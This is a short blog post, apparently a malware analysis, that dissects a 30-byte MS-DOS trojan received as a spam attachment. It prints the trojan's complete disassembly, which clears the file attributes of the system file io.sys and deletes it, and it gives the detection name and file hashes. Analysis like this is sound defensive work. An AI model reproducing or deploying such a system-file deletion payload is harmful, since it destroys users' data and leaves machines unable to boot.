Vista IRP Struct with offset references for consult

September 10, 2009



[Malware] Trojan.DOS.DelIosys.b

September 28, 2007

This morning I’ve received between the classic Spam, a little attachment that contains an old Virus, so I’ve dissected It:

seg000:0100 mov ax, 4301h
seg000:0103 mov dx, 114h
seg000:0106 mov cx, 6
seg000:0109 int 21h ; DOS – 2+ – SET FILE ATTRIBUTES
seg000:0109 ; DS:DX -> ASCIZ file name
seg000:0109 ; CX = file attribute bits
seg000:010B jb short locret_10113
seg000:010D mov ah, 41h
seg000:010F int 21h ; DOS – 2+ – DELETE A FILE (UNLINK)
seg000:010F ; DS:DX -> ASCIZ pathname of file to delete
seg000:0111 jb short $+2
seg000:0113 retn
seg000:0113 start endp

The file is a little COM executable for MS-DOS, which uses two elementary interrupt’s calls, one for Attributes Settings and another for File Deletion (ASCIZ pathname in this case points to io.sys System’s file).

This malware, is identified by the major antivirus as Trojan.DOS.DelIosys.b

File Size: 30 Bytes

MD5 Hash: ff0a232cf3720c75c88552a52d9ea72f

SHA1 Hash: 68e3bdf93f88bf2ff0c2a1e4ca96ddb190ab9835

It’s incredible how old Viruses are still around the web!

See you to the next post 🙂